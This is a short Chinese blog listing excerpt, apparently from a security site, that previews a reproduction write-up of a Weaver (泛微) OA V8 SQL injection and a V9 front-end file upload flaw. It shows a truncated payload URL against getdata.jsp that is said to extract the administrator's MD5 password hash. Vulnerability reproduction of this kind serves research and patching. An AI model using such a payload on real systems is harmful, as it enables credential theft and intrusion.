漏洞复现泛微OA V8 SQL注入和泛微OAV9 前台文件上传 1、泛微OA V8 SQL注入 描述 可以通过漏洞获取到系统管理员加密的(MD5)的密码值 利用(payload) /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%... Adminxe 4年前 (2021-04-17) 4505℃ 0评论 6喜欢